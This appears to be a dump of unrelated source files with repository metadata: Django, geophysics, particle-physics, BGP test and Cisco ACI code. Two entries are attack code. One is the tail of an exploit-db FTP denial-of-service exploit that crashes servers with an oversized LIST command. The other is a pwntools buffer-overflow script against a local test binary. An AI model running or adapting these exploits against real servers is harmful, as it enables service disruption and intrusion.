print "\t\t[+]Servidor e Vulneravel:)\n"
time.sleep(1)
else:
print "\t\t[+]Sinto Muito, Servidor Nao e Vulneravel:(\n"
time.sleep(1)
print "\t\t[+]Enviando Exploit Denial of Service\n"
time.sleep(1)
s.send("USER anonymous\r\n")
s.recv(2000)
s.send("PASS\r\n")
s.recv(2000)
s.send("LIST "+buf+"\r\n")
print "\t\t[+]Exploit Enviado Com Sucesso ao Servidor "+sys.argv[1]+"\n"
time.sleep(1)
print "\t\t[+]Checando Se o Exploit Funcionou\n"
time.sleep(1)
try:
sock = socket.socket(socket.AF_INET,sock.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print "\t\t[+]Sinto Muito o Exploit Nao Funcionou:(\n"
time.sleep(1)
sys.exit(0)
except:
print "\t\t[+]Exploit Funcionou, Servidor Derrubado:)\n"
time.sleep(1)
except:
print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n"
|
[
"info@exploit-db.com"
] |
info@exploit-db.com
|
ed1e78002b6d5631a704ce698be181c232c0acf8
|
a475b8dfdbc90a57470b5be8dfd6fa2367de73f3
|
/testproj/testapp/models.py
|
f7132e89fc9556e3630c00942b04b806b562cece
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
Moliholy/django-tastypie-crust
|
9080be75726385716d75280f68cef7ad25b90761
|
520154aa36aa4ba9e132c4ea1d042ea8bcb235b2
|
refs/heads/master
| 2020-03-18T19:26:20.528764
| 2018-05-28T12:10:52
| 2018-06-12T14:53:26
| 135,154,352
| 0
| 0
| null | 2018-05-28T11:53:52
| 2018-05-28T11:53:51
| null |
UTF-8
|
Python
| false
| false
| 508
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8
from django.db import models
from django.utils.translation import ugettext, ugettext_lazy as _
class Homepage(models.Model):
user = models.ForeignKey('auth.User')
url = models.URLField()
class Meta:
verbose_name = _('Homepage')
verbose_name_plural = _('Homepages')
def __unicode__(self):
format = ugettext('Homepage %(url)s of user %(username)s')
return format % {'url': self.url, 'username': self.user.username}
|
[
"uranusjr@gmail.com"
] |
uranusjr@gmail.com
|
b2a5716e29cbd359293a072d81733438f86495a2
|
52e45c26c110c42de79383e8034fd280fd82a02f
|
/spatialdata/spatialdb/GravityField.py
|
13f3d151d4951e63b963de4d5d79d09bf78493dc
|
[
"MIT"
] |
permissive
|
geodynamics/spatialdata
|
1ae1d2583aae356e9e68cd434c1f17820b49d127
|
2da6aad61c136f0e15f066aaea5fd31851de112f
|
refs/heads/main
| 2023-08-15T07:22:17.676228
| 2023-07-28T03:32:07
| 2023-07-28T03:32:07
| 12,651,854
| 6
| 20
|
MIT
| 2023-07-28T03:32:09
| 2013-09-06T18:52:14
|
C++
|
UTF-8
|
Python
| false
| false
| 2,821
|
py
|
# ----------------------------------------------------------------------
#
# Brad T. Aagaard, U.S. Geological Survey
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2023 University of California, Davis
#
# See LICENSE.md for license information.
#
# ----------------------------------------------------------------------
from .SpatialDBObj import SpatialDBObj
from .spatialdb import GravityField as ModuleGravityField
class GravityField(SpatialDBObj, ModuleGravityField):
"""
Spatial database with gravity field information.
Implements `SpatialDB`.
"""
DOC_CONFIG = {
"cfg": """
# Specify a gravity field in 2D with gravity in the -y direction.
[gravity_field]
gravity_dir = [0, -1]
acceleration = 9.80665*meter/second**2
""",
}
import pythia.pyre.inventory
gravityDir = pythia.pyre.inventory.list("gravity_dir", default=[0.0, 0.0, -1.0])
gravityDir.meta['tip'] = "Direction of gravitational body force. " \
"(used only with a Cartesian coordinate system."
from pythia.pyre.units.length import meter
from pythia.pyre.units.time import second
acceleration = pythia.pyre.inventory.dimensional("acceleration",
default=9.80665 * meter / second**2)
acceleration.meta['tip'] = "Gravitational acceleration."
def __init__(self, name="gravityfield"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
def _defaults(self):
self.description = "Gravity field"
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self._validateParameters(self.inventory)
dir = list(map(float, self.gravityDir))
ModuleGravityField.setGravityDir(self, dir[0], dir[1], dir[2])
ModuleGravityField.setGravityAcc(self, self.acceleration.value)
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleGravityField.__init__(self)
def _validateParameters(self, params):
"""
Validate parameters.
"""
if (len(params.gravityDir) != 3):
raise ValueError("Gravity direction must be a 3 component list or tuple.")
try:
dirFloat = list(map(float, params.gravityDir))
except:
raise ValueError("Gravity direction must contain floating point values.")
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with GravityField.
"""
return GravityField()
# End of file
|
[
"baagaard@usgs.gov"
] |
baagaard@usgs.gov
|
6881aba7454b96576813d8e61f3828f6399b7b00
|
0fccee4c738449f5e0a8f52ea5acabf51db0e910
|
/genfragments/ThirteenTeV/XXTo4J/XXTo4J_M-50_CTau-1000mm_TuneCUETP8M1_13TeV_pythia8_cff.py
|
f20e41d229265892646774f2207a200192607813
|
[] |
no_license
|
cms-sw/genproductions
|
f308ffaf3586c19b29853db40e6d662e937940ff
|
dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4
|
refs/heads/master
| 2023-08-30T17:26:02.581596
| 2023-08-29T14:53:43
| 2023-08-29T14:53:43
| 11,424,867
| 69
| 987
| null | 2023-09-14T12:41:28
| 2013-07-15T14:18:33
|
Python
|
UTF-8
|
Python
| false
| false
| 2,894
|
py
|
COM_ENERGY = 13000. # GeV
MASS_POINT = 50 # GeV
CROSS_SECTION = 1 # pb
CTAU_POINT = 1000 # mm
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(0),
filterEfficiency = cms.untracked.double(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
"Higgs:useBSM = on",
"HiggsBSM:all = off",
"HiggsBSM:ffbar2A3H2 = on",
"35:m0 = %s" % MASS_POINT,
"36:m0 = %s" % MASS_POINT,
"35:tau0 = %s" % CTAU_POINT,
"36:tau0 = %s" % CTAU_POINT,
"35:0:bRatio = .2",
"35:1:bRatio = .2",
"35:2:bRatio = .2",
"35:3:bRatio = .2",
"35:4:bRatio = .2",
"35:5:bRatio = 0",
"35:9:bRatio = 0",
"35:10:bRatio= 0",
"36:0:bRatio = .2",
"36:1:bRatio = .2",
"36:2:bRatio = .2",
"36:3:bRatio = .2",
"36:4:bRatio = .2",
"36:5:bRatio = 0",
"36:9:bRatio = 0",
"36:10:bRatio = 0",
"35:0:meMode = 100",
"35:1:meMode = 100",
"35:2:meMode = 100",
"35:3:meMode = 100",
"35:4:meMode = 100",
"35:5:meMode = 100",
"35:9:meMode = 100",
"35:10:meMode = 100",
"36:0:meMode = 100",
"36:1:meMode = 100",
"36:2:meMode = 100",
"36:3:meMode = 100",
"36:4:meMode = 100",
"36:5:meMode = 100",
"36:9:meMode = 100",
"36:10:meMode = 100",
"HiggsA3:coup2d = 1",
"HiggsA3:coup2u = 1",
"HiggsA3:coup2H1Z = 0",
"HiggsA3:coup2H2Z = 1",
"HiggsA3:coup2l = 0",
"HiggsA3:coup2HchgW = 0",
"HiggsH2:coup2d = 1",
"HiggsH2:coup2u = 1",
"HiggsH2:coup2l = 0",
"HiggsH2:coup2Z = 0",
"HiggsH2:coup2W = 0",
"HiggsH2:coup2H1H1 = 0",
"HiggsH2:coup2A3A3 = 0",
"35:onMode = off",
"35:onIfAny = 1 2 3 4 5",
"36:onMode = off",
"36:onIfAny = 1 2 3 4 5",
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
|
[
"dnash@cern.ch"
] |
dnash@cern.ch
|
a445d7c740160a7e33848149248180741d45af83
|
077a17b286bdd6c427c325f196eb6e16b30c257e
|
/00_BofVar-unit-tests/07_32/remenissions-work/exploit-BofVar-3.py
|
b8ea6ed45800852876c676f658926951160fa819
|
[] |
no_license
|
KurSh/remenissions_test
|
626daf6e923459b44b82521aa4cb944aad0dbced
|
9dec8085b62a446f7562adfeccf70f8bfcdbb738
|
refs/heads/master
| 2023-07-08T20:25:04.823318
| 2020-10-05T06:45:16
| 2020-10-05T06:45:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-07-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x5a)
bof_payload.add_int32(0x28, 0xdead)
bof_payload.add_int32(0x24, 0xdead)
bof_payload.add_int32(0x20, 0xdeae)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
|
[
"ryancmeinke@gmail.com"
] |
ryancmeinke@gmail.com
|
f69ce16005e44fc509989b7f6e007b21ae1b0ae5
|
ff7e133648566b8a705cb5a214be8a82df5101d9
|
/algorithm/work_1/test.py
|
a15a7f356574f4bf7509cf40eb11373a9185fc38
|
[] |
no_license
|
hoik92/Algorithm
|
231433193ecba4a48ef830cab2c5b0115fa7246d
|
4085b83a692a211e10503949d4518205d404dcaf
|
refs/heads/master
| 2020-04-27T06:27:06.777255
| 2019-04-18T23:48:30
| 2019-04-18T23:48:30
| 174,108,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
import sys
sys.stdin = open('input.txt', 'r')
def mx_mn(T):
mxidx, mnidx = 0, 0
for i in range(len(T)):
if T[mxidx] < T[i]:
mxidx = i
if T[mnidx] > T[i]:
mnidx = i
return mxidx, mnidx
for tc in range(1, 11):
D = int(input())
T = list(map(int, input().split()))
for x in range(D):
mxidx, mnidx = mx_mn(T)
T[mxidx] -= 1
T[mnidx] += 1
mxidx, mnidx = mx_mn(T)
print(f"#{tc} {T[mxidx] - T[mnidx]}")
# for x in range(D):
# T[T.index(max(T))] -= 1
# T[T.index(min(T))] += 1
# print(f"#{tc} {max(T) - min(T)}")
|
[
"hoik92@nate.com"
] |
hoik92@nate.com
|
0c233a30fd722986b1ae834d7faed0df4ed8cd18
|
a40d2a4c1704c080b0454805218b7dd07f28218c
|
/yabgp/tests/unit/message/attribute/test_extcommunity.py
|
bb67218e7535e1898aafbbbca3858bf10dd9a231
|
[
"Apache-2.0"
] |
permissive
|
plucena24/yabgp
|
e524b2c58b262ddba868a93cbbab3c5a6f3419aa
|
bc817ed74b21743797faee565fe54efb1f4b85c7
|
refs/heads/master
| 2023-08-21T02:19:20.937686
| 2015-08-04T09:30:49
| 2015-08-04T09:30:49
| 40,301,596
| 0
| 0
|
Apache-2.0
| 2023-08-14T21:29:51
| 2015-08-06T11:35:33
|
Python
|
UTF-8
|
Python
| false
| false
| 4,466
|
py
|
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Test extended Community attribute """
import unittest
from yabgp.common import constants as bgp_cons
from yabgp.common import exception as excep
from yabgp.message.attribute.extcommunity import ExtCommunity
class TestExtCommunity(unittest.TestCase):
def test_parse_rt0(self):
# Route Target,Format AS(2bytes):AN(4bytes)
ext_community = ExtCommunity.parse(value=b'\x00\x02\x00\x64\x00\x00\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_0, '100:12')], ext_community)
def test_construct_rt0(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_0, '100:12')])
self.assertEqual(b'\xc0\x10\x08\x00\x02\x00\x64\x00\x00\x00\x0c', ext_community)
def test_parse_rt1(self):
# Route Target,Format IPv4 address(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x01\x02\x0a\x0a\x0a\x0a\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_1, '10.10.10.10:12')], ext_community)
def test_construct_rt1(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_1, '10.10.10.10:12')])
self.assertEqual(b'\xc0\x10\x08\x01\x02\x0a\x0a\x0a\x0a\x00\x0c', ext_community)
def test_parse_rt2(self):
# Route Target,Format AS(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x02\x02\x00\x01\x00\x01\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_2, '65537:12')], ext_community)
def test_construct_rt2(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_2, '65537:12')])
self.assertEqual(b'\xc0\x10\x08\x02\x02\x00\x01\x00\x01\x00\x0c', ext_community)
def test_parse_ro0(self):
# Route Origin,Format AS(2bytes):AN(4bytes)
ext_community = ExtCommunity.parse(value=b'\x00\x03\x00\x64\x00\x00\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_0, '100:12')], ext_community)
def test_construct_ro0(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_0, '100:12')])
self.assertEqual(b'\xc0\x10\x08\x00\x03\x00\x64\x00\x00\x00\x0c', ext_community)
def test_parse_ro1(self):
# Route Origin,Format IPv4 address(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x01\x03\x0a\x0a\x0a\x0a\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_1, '10.10.10.10:12')], ext_community)
def test_construct_ro1(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_1, '10.10.10.10:12')])
self.assertEqual(b'\xc0\x10\x08\x01\x03\x0a\x0a\x0a\x0a\x00\x0c', ext_community)
def test_parse_ro2(self):
# Route Origin,Format AS(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x02\x03\x00\x01\x00\x01\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_2, '65537:12')], ext_community)
def test_construct_ro2(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_2, '65537:12')])
self.assertEqual(b'\xc0\x10\x08\x02\x03\x00\x01\x00\x01\x00\x0c', ext_community)
def test_parse_invalid_length(self):
# invalid length
self.assertRaises(excep.UpdateMessageError, ExtCommunity.parse,
b'\x00\x00\x02\x00\x64\x00\x00\x00\x0c')
try:
ExtCommunity.parse(value=b'\x00\x00\x02\x00\x64\x00\x00\x00\x0c')
except excep.UpdateMessageError as e:
self.assertEqual(bgp_cons.ERR_MSG_UPDATE_ATTR_LEN, e.sub_error)
def test_parse_unknow(self):
# unknow
hex_tmp = b'\x09\x03\x00\x01\x00\x01\x00\x0c'
ext_community = ExtCommunity.parse(value=hex_tmp)
self.assertEqual(bgp_cons.BGP_EXT_COM_UNKNOW, ext_community[0][0])
if __name__ == '__main__':
unittest.main()
|
[
"xiaoquwl@gmail.com"
] |
xiaoquwl@gmail.com
|
ff20799864d9ab1630cd84985b26232f955a7bad
|
8ed9296cf14cbd48ad6c6ba977a4eddfb6158ec3
|
/src/idealised/simple_physics/simple_physics_custom.py
|
f427bcf74ae3c3f900988a4ea169b9ce6119018d
|
[
"BSD-3-Clause"
] |
permissive
|
JoyMonteiro/CliMT
|
51191c8e44eef28057971dd29de8e40c0bd3ef97
|
0949ed3a3a125638072351d7277ae4b956956d35
|
refs/heads/master
| 2021-04-09T17:45:56.369908
| 2016-10-28T08:32:26
| 2016-10-28T08:32:26
| 28,734,117
| 2
| 0
| null | 2015-01-03T03:45:23
| 2015-01-03T03:45:22
| null |
UTF-8
|
Python
| false
| false
| 6,114
|
py
|
import numpy as np
from component import Component
import _simple_physics_custom as phys
from grid import Grid
class simple_physics_custom(Component):
"""
Interface to the simple physics package. This is a modified version which allows the
user to switch off any of the three routines : large scale condensation, surface fluxes,
or boundary layer parameterisation
Reed and Jablonowski 2012:
title = {Idealized tropical cyclone simulations of intermediate complexity: a test case for {AGCMs}}
journal = {Journal of Advances in Modeling Earth Systems}
Instantiation
============
sp = climt.simple_physics(<args>)
where <args> include the following REQUIRED arguments:
Name Dims Meaning Units Default Notes
grid (object) grid generated by by another
component which is used to
get latitudes for calculating
the forcing
dt 0 The (constant) time step to be seconds
used by the physics
Ts 2 The surface temperature to use IF
use_ext_ts is True (= 1)
and the following OPTIONAL arguments (1 indicates True, use 0 for False):
Name Dims Meaning Units Default Notes
cyclone 0 Integer indicating if 1
the physics must simulate
a cyclone. If 0, it
will simulate a moist baroclinic
environment. This option is used
only to generate surface temperatures.
This will be ignored if external
surface temperatures are
prescribed
lsc 0 Integer indicating whether
large scale condensation is active 1
pbl 0 Integer indicating whether 1
boundary layer is active
surf_flux 0 Integer indicating whether 1
surface fluxes are active
use_ext_ts 0 Integer indicating whether 0
surface temperature is externally
specified (else internal default
corresponding to constant value
of 302.15 K is used)
qflux 0 Integer indicating whether surface 1
latent heat fluxes are calculated
momflux 0 Integer indicating whether surface 1
momentum fluxes are calculated
tflux 0 Integer indicating whether surface 1
sensible heat fluxes are calculated
Usage
=====
call instance directly to get increments
inc = sp(<args>)
where <args> are the following REQUIRED arguments:
Name Dims Meaning Units Default Notes
U 3 zonal winds ms-1
V 3 meridional winds ms-1
T 3 temperature K
p 3 atmospheric pressure Pa
pint 3 Pressure at model interfaces Pa
q 3 specific humidity g kg-1
ps 2 surface pressure Pa
* Outputs that are accessible as sp.<Name>
Name Dims Meaning Units Default Notes
Udot 3 zonal wind tendency ms-2
Vdot 3 meridional wind tendency ms-2
Tdot 3 temperature tendency Ks-1
qdot 3 humidity tendency g kg-1
precc 2 precipitation
"""
def __init__(self, **kwargs):
self.Name = 'simple_physics'
self.LevType = 'p'
self.SteppingScheme = 'explicit'
self.ToExtension = ['U', 'V', 'T', 'p', 'pint', 'q', 'ps']
self.Required = ['U', 'V', 'T', 'p', 'pint', 'q', 'ps']
self.FromExtension = ['Uinc', 'Vinc', 'Tinc', 'qinc', 'precc']
self.Prognostic = ['U', 'V', 'T', 'q']
self.Diagnostic = ['precc']
if 'grid' not in kwargs:
kwargs['grid'] = Grid(self,**kwargs)
time_step = 0
if 'dt' not in kwargs:
raise IndexError, '\n\n dt is a required argument'
nlevs = kwargs['grid']['nlev']
nlats = kwargs['grid']['nlat']
nlons = kwargs['grid']['nlon']
time_step = kwargs['dt']
phys.init_simple_physics(1, nlons, nlats, nlevs, time_step, kwargs)
Component.__init__(self,**kwargs)
def driver(self, u, v, temp, p, pint, q, ps, simTime=-1):
'''
Returns the tendencies for a simplified moist physics simulation
'''
latitudes = self.Grid['lat']
nlats = self.Grid['nlat']
nlons = self.Grid['nlon']
lons,lats,levs = u.shape
assert lons == nlons
assert lats == nlats
u_tend = np.zeros(u.shape)
v_tend = np.zeros(v.shape)
t_tend = np.zeros(temp.shape)
q_tend = np.zeros(q.shape)
precip = np.zeros((nlons,nlats))
t_out, u_out, v_out, q_out, precip_out = \
phys.get_tendencies(u, v, temp,
p, pint, q,
ps, latitudes)
return u_out,v_out,t_out,q_out,precip_out
|
[
"joy.merwin@gmail.com"
] |
joy.merwin@gmail.com
|
4b642e6a61f839f7027c9f80ffb3381877982af2
|
d63c503df093f4a6f2e4f5fa796c4864a4418461
|
/subarray.py
|
27c8cbb61999db7937c16409f9634e6da000b139
|
[] |
no_license
|
99rishita/Geeksforgeeks
|
963e4c9d484cd615e7ffb7f640d712f15cb7ad3e
|
ece2da9e1a5f39a54de4af4ee13913e67b10745e
|
refs/heads/master
| 2022-12-29T04:28:11.004559
| 2020-10-02T18:24:39
| 2020-10-02T18:24:39
| 277,882,127
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 460
|
py
|
def subarraysum(arr, k):
sum = 0
for i in range(0, len(arr)):
sum = arr[i]
#j = i+1
for j in range(i+1, len(arr)):
sum = sum + arr[j]
if sum > k:
break
if sum == k:
print(i+1)
print(j+1)
return
#arr = [1,2,3,7,5]
#k = 12
#arr = [1,2,3,4,5,6,7,8,9,10]
#k = 15
arr = [1, 4, 20, 3, 10, 5]
k = 33
subarraysum(arr, k)
|
[
"pinnintirevati999@gmail.com"
] |
pinnintirevati999@gmail.com
|
edcde8943da6aedbe6d9cb618303471335c58763
|
2da355c3e63d911995bd5661100d858ceeae5493
|
/python_data/Chapter 7/P/P-7.45.py
|
264f3ee6748288442c770f7725f1dce5236145c1
|
[] |
no_license
|
allenxzy/Data-and-Structures-and-Alogrithms
|
1f72e7471f7d8f8982985986eda57f896e73087d
|
5977ea9434b42032069b24a538f455067ef38283
|
refs/heads/master
| 2021-01-16T21:46:24.199337
| 2016-12-14T08:05:40
| 2016-12-14T08:05:40
| 60,823,594
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 566
|
py
|
#-*-coding: utf-8 -*-
"""
An array A is sparse if most of its entries are empty (i.e., None). A list
L can be used to implement such an array efficiently. In particular, for
each nonempty cell A[i], we can store an entry (i,e) in L, where e is the
element stored at A[i]. This approach allows us to represent A using O(m)
storage, where m is the number of nonempty entries in A. Provide such
a SparseArray class that minimally supports methods__getitem__(j) and
__setitem__(j, e) to provide standard indexing operations. Analyze the
efficiency of these methods.
"""
|
[
"xuzhiyuan0317@live.com"
] |
xuzhiyuan0317@live.com
|
92d622b8979f7189633fda47981ae316e0f50bb1
|
c4efe9f6416f989524fafb128525a0a71272f680
|
/python/python-test.py
|
a0fc2d56f0ca9636405a5daa8bf9512c4329afe5
|
[] |
no_license
|
drautb/sketchbook
|
dcc6eb586ffe739ee21ab74aa6b045073d38fc6b
|
12255fc3cc5c2cbccbc174333c76c339d9846d67
|
refs/heads/master
| 2023-07-27T10:05:40.737633
| 2023-07-25T19:18:32
| 2023-07-25T19:18:32
| 28,785,534
| 4
| 3
| null | 2023-03-07T03:15:24
| 2015-01-04T20:46:06
|
C++
|
UTF-8
|
Python
| false
| false
| 1,712
|
py
|
"""
Determine which elements in each array are not present in the other.
Numbers in array 1 that aren't in array 2:
<num1> <num2> <num3>...
Numbers in array 2 that aren't in array 1:
<num1> <num2> <num3>...
"""
def reconcileHelper(arr_a, arr_b):
in_a_not_b = []
in_b_not_a = []
# Some effort is wasted by subtracting both arrays from eachother.
# Instead, sort both arrays up front, (2 * NlogN) then iterate over them in parallel,
# noting which items are skipped in each array as we go.
arr_a.sort()
arr_b.sort()
a_len = len(arr_a)
b_len = len(arr_b)
arr_a_idx = 0
arr_b_idx = 0
while arr_a_idx < a_len and arr_b_idx < b_len:
# If the current element is in both, move on.
a_val = arr_a[arr_a_idx]
b_val = arr_b[arr_b_idx]
if a_val == b_val:
arr_a_idx += 1
arr_b_idx += 1
continue
# If they're not the same, record the lower one as a difference,
# and increment only that index.
if a_val < b_val:
in_a_not_b.append(a_val)
arr_a_idx += 1
else:
in_b_not_a.append(b_val)
arr_b_idx += 1
# There may have been some numbers left at the end of one of the lists.
# We need to add these to the difference.
if arr_a_idx < a_len:
in_a_not_b += arr_a[arr_a_idx:]
elif arr_b_idx < b_len:
in_b_not_a += arr_b[arr_b_idx:]
print("Numbers in array 1 that aren't in array 2:")
print_array(in_a_not_b)
print("Numbers in array 2 that aren't in array 1:")
print_array(in_b_not_a)
return
def print_array(arr):
for n in arr:
print("%d" % n, end=" ")
print("")
|
[
"drautb@gmail.com"
] |
drautb@gmail.com
|
cf57d9388cb7e3d352c181533f5217e8ac7d4f9a
|
95d73f1daebb98fe6707b999c9763f3b84d418a4
|
/cms/tests/mail.py
|
1b5281d7451060ae56a54f9cbb7b5364631a6269
|
[] |
no_license
|
leotop/django_ukrhim
|
8e01e284076878c7691986d5e8d056795d2bb900
|
e5a60a79f441ae732350e518f9b71e2724dc010a
|
refs/heads/master
| 2021-01-22T15:51:27.617651
| 2015-01-23T11:00:37
| 2015-01-23T11:00:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
# -*- coding: utf-8 -*-
from cms.api import create_page_user
from cms.test_utils.testcases import CMSTestCase
from cms.utils.mail import mail_page_user_change
from django.core import mail
from django.contrib.auth.models import User
class MailTestCase(CMSTestCase):
def setUp(self):
mail.outbox = [] # reset outbox
def test_mail_page_user_change(self):
user = User.objects.create_superuser("username", "username@django-cms.org", "username")
user = create_page_user(user, user, grant_all=True)
mail_page_user_change(user)
self.assertEqual(len(mail.outbox), 1)
|
[
"root@ip-172-31-19-251.us-west-2.compute.internal"
] |
root@ip-172-31-19-251.us-west-2.compute.internal
|
060ffffdae42855cbce9c3ae529ae8e62c711b23
|
8b187f3d60446b39a8f2ba976688ed493798fc64
|
/portal/migrations/0007_note.py
|
755564f8c5a2e3459cdfe33a6edeb0a0548dbaf1
|
[] |
no_license
|
JackSnowdon/JobHunter
|
4eb8c5bd2e5cf7c97ca5b29f697e8f95d98a5bb3
|
a2c87a6a7b14fd5231b6d99502a638ea702015a4
|
refs/heads/master
| 2022-12-19T07:27:39.354155
| 2020-10-02T17:32:00
| 2020-10-02T17:32:00
| 297,356,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
# Generated by Django 3.1.1 on 2020-09-25 15:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('portal', '0006_job_last_updated'),
]
operations = [
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('job', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='noted', to='portal.job')),
],
),
]
|
[
"jacksnowdondrums@gmail.com"
] |
jacksnowdondrums@gmail.com
|
d932f0e7d08cd74e5251f86ce83becb224158a88
|
fdf0b68373e003bd9f4f65e1194e3e79d7e18f4c
|
/day2/class_property.py
|
d8071ea3cfd35a66da48ab8039b7eb7fe7b53d08
|
[] |
no_license
|
artheadsweden/python_advanced_nov_17
|
79b721077da3ba3bb630fde53832071d4e71c3ae
|
20f9d99ba4b996414b36fb0efe7244895b3fd34b
|
refs/heads/master
| 2021-03-24T11:08:43.733521
| 2017-11-22T23:32:23
| 2017-11-22T23:32:23
| 111,556,488
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 396
|
py
|
class P:
def __init__(self, x):
self.x = x
@property
def x(self):
return self.__x
@x.setter
def x(self, x):
if x < 0:
self.__x = 0
elif x > 1000:
self.__x = 1000
else:
self.__x = x
def main():
p = P(5000)
print(p.x)
p.x = 100000
print(p.x)
if __name__ == '__main__':
main()
|
[
"joakim@arthead.se"
] |
joakim@arthead.se
|
037b23778dce32e14f051a0ac32f92024cf4db53
|
24fe1f54fee3a3df952ca26cce839cc18124357a
|
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/rtflt/rule.py
|
a30362b62695f20e291ad7aa5994ee5f6c75ad0d
|
[] |
no_license
|
aperiyed/servicegraph-cloudcenter
|
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
|
9eb7975f2f6835e1c0528563a771526896306392
|
refs/heads/master
| 2023-05-10T17:27:18.022381
| 2020-01-20T09:18:28
| 2020-01-20T09:18:28
| 235,065,676
| 0
| 0
| null | 2023-05-01T21:19:14
| 2020-01-20T09:36:37
|
Python
|
UTF-8
|
Python
| false
| false
| 4,052
|
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class Rule(Mo):
meta = ClassMeta("cobra.model.rtflt.Rule")
meta.isAbstract = True
meta.moClassName = "rtfltRule"
meta.moClassName = "rtfltRule"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Rule"
meta.writeAccessMask = 0x401002001
meta.readAccessMask = 0x401002001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.pol.Instr")
meta.superClasses.add("cobra.model.nw.FltRule")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
